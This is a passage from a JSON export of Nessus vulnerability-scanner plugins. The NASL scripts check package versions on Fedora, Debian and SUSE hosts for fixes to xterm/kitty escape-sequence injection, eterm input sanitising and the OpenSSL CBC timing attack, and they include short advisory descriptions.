get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Fedora' >!< os_release) audit(AUDIT_OS_NOT, 'Fedora');\nvar os_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^37([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 37', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\nvar pkgs = [\n {'reference':'kitty-0.26.5-6.fc37', 'release':'FC37', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kitty');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-15T13:33:44", "description": "The remote Fedora 38 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2023-a004ecb3f8 advisory.\n\n - CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071. (CVE-2008-2383)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-26T00:00:00", "type": "nessus", "title": "Fedora 38 : kitty (2023-a004ecb3f8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2023-07-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:38", "p-cpe:/a:fedoraproject:fedora:kitty"], "id": "FEDORA_2023-A004ECB3F8.NASL", "href": "https://www.tenable.com/plugins/nessus/178790", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2023-a004ecb3f8\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178790);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/26\");\n\n script_cve_id(\"CVE-2008-2383\");\n script_xref(name:\"FEDORA\", value:\"2023-a004ecb3f8\");\n\n script_name(english:\"Fedora 38 : kitty (2023-a004ecb3f8)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 38 host has a package installed that is affected by a vulnerability as referenced in the\nFEDORA-2023-a004ecb3f8 advisory.\n\n - CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF\n (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS)\n escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071. (CVE-2008-2383)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2023-a004ecb3f8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kitty package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-2383\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:38\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kitty\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Fedora' >!< os_release) audit(AUDIT_OS_NOT, 'Fedora');\nvar os_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^38([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 38', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\nvar pkgs = [\n {'reference':'kitty-0.29.1-1.fc38', 'release':'FC38', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kitty');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-26T14:34:18", "description": "This update fixes the following security issue: CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-01-16T00:00:00", "type": "nessus", "title": "Fedora 9 : xterm-238-1.fc9 (2009-0059)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xterm", "cpe:/o:fedoraproject:fedora:9"], "id": "FEDORA_2009-0059.NASL", "href": "https://www.tenable.com/plugins/nessus/35388", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-0059.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35388);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2383\");\n script_xref(name:\"FEDORA\", value:\"2009-0059\");\n\n script_name(english:\"Fedora 9 : xterm-238-1.fc9 (2009-0059)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue: CRLF injection\nvulnerability in xterm allows user-assisted attackers to execute\narbitrary commands via LF (aka \\n) characters surrounding a command\nname within a Device Control Request Status String (DECRQSS) escape\nsequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=479000\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-January/018513.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2a4f9db\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xterm package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xterm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"xterm-238-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xterm\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:40:52", "description": "This update fixes the following security issue: CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-01-16T00:00:00", "type": "nessus", "title": "Fedora 8 : xterm-238-1.fc8 (2009-0154)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xterm", "cpe:/o:fedoraproject:fedora:8"], "id": "FEDORA_2009-0154.NASL", "href": "https://www.tenable.com/plugins/nessus/35391", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-0154.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35391);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2383\");\n script_xref(name:\"FEDORA\", value:\"2009-0154\");\n\n script_name(english:\"Fedora 8 : xterm-238-1.fc8 (2009-0154)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue: CRLF injection\nvulnerability in xterm allows user-assisted attackers to execute\narbitrary commands via LF (aka \\n) characters surrounding a command\nname within a Device Control Request Status String (DECRQSS) escape\nsequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=479000\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-January/018625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57cf492a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xterm package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xterm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"xterm-238-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xterm\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:18:36", "description": "H.D. Moore discovered several terminal emulator security issues. One of them covers escape codes that are interpreted by the terminal emulator. This could be exploited by an attacker to insert malicious commands hidden for the user, who has to hit enter to continue, which would also execute the hidden commands.", "cvss3": {}, "published": "2004-09-29T00:00:00", "type": "nessus", "title": "Debian DSA-496-1 : eterm - missing input sanitising", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0068"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eterm", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-496.NASL", "href": "https://www.tenable.com/plugins/nessus/15333", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-496. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15333);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0068\");\n script_bugtraq_id(10237);\n script_xref(name:\"DSA\", value:\"496\");\n\n script_name(english:\"Debian DSA-496-1 : eterm - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"H.D. Moore discovered several terminal emulator security issues. One\nof them covers escape codes that are interpreted by the terminal\nemulator. This could be exploited by an attacker to insert malicious\ncommands hidden for the user, who has to hit enter to continue, which\nwould also execute the hidden commands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=244808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-496\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the eterm package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.2-0pre2002042903.3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eterm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"eterm\", reference:\"0.9.2-0pre2002042903.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:34:21", "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:011 (openssl).\n\n\nOpenSSL is an implementation of the Secure Sockets Layer and Transport Layer Security protocols and provides strong cryptography for many applications in a Linux system. It is a default package in all SUSE products.\n\nA security weakness has been found, known as 'Vaudenay timing attack on CBC', named after one of the discoverers (Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion)).\nThe weakness may allow an attacker to obtain a plaintext data block by observing timing differences in response to two different error cases (cipher padding errors vs. MAC verification errors).\nIn order to exploit this vulnerability, the attacker has to meet certain requirements: The network connection between client and server must be of high quality to be able to observe timing differences, the attacker must be able to perform a man-in-the-middle attack, the transactions must repeatedly contain the same (encrypted) plain text block (such as a pop password or alike), and decoding failures in the SSL layer must not be propagated to the application that is using the SSL connection.\nThese exploitation conditions considerably reduce the security risk imposed by the vulnerability. However, we recommend to completely remedy this weakness by installing the update packages for your system according to the following guidelines. There does not exist any temporary workaround for this problem other than applying the update packages.\n\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.", "cvss3": {}, "published": "2004-07-25T00:00:00", "type": "nessus", "title": "SUSE-SA:2003:011: openssl", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SUSE_SA_2003_011.NASL", "href": "https://www.tenable.com/plugins/nessus/13783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:011\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(13783);\n script_bugtraq_id(6884, 6946);\n script_version(\"1.17\");\n script_cve_id(\"CVE-2003-0078\");\n \n name[\"english\"] = \"SUSE-SA:2003:011: openssl\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:011 (openssl).\n\n\nOpenSSL is an implementation of the Secure Sockets Layer and Transport\nLayer Security protocols and provides strong cryptography for many\napplications in a Linux system. It is a default package in all SUSE\nproducts.\n\nA security weakness has been found, known as 'Vaudenay timing attack\non CBC', named after one of the discoverers (Brice Canvel (EPFL), Alain\nHiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion)).\nThe weakness may allow an attacker to obtain a plaintext data block by\nobserving timing differences in response to two different error cases\n(cipher padding errors vs. MAC verification errors).\nIn order to exploit this vulnerability, the attacker has to meet certain\nrequirements: The network connection between client and server must be\nof high quality to be able to observe timing differences, the attacker\nmust be able to perform a man-in-the-middle attack, the transactions\nmust repeatedly contain the same (encrypted) plain text block (such as\na pop password or alike), and decoding failures in the SSL layer must\nnot be propagated to the application that is using the SSL connection.\nThese exploitation conditions considerably reduce the security risk\nimposed by the vulnerability. However, we recommend to completely\nremedy this weakness by installing the update packages for your system\naccording to the following guidelines. There does not exist any temporary\nworkaround for this problem other than applying the update packages.\n\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_011_openssl.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the openssl package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"openssl-0.9.6a-78\", release:\"SUSE7.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6a-78\", release:\"SUSE7.2\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6b-154\", release:\"SUSE7.3\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6c-83\", release:\"SUSE8.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( reference:\"openssl-0.9.6g-55\", release:\"SUSE8.1\") )\n{\n security_warning(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"openssl-\", release:\"SUSE7.1\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"openssl-\", release:\"SUSE8.1\") )\n{\n set_kb_item(name:\"CVE-2003-0078\", value:TRUE);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-22T14:32:49", "description": "A vulnerability has been discovered in OpenSSL, a Secure Socket Layer (SSL) implementation. In an upcoming paper, Brice Canvel (EPFL), Alain Hiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL, Ilion) describe and demonstrate a timing-based attack on CBC cipher suites used in SSL and TLS. OpenSSL has been found to be vulnerable to this attack.", "cvss3": {}, "published": "2004-09-29T00:00:00", "type": "nessus", "title": "Debian DSA-253-1 : openssl - information leak", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0078"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssl", "cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-253.NASL", "href": "https://www.tenable.com/plugins/nessus/15090", "sourceData": 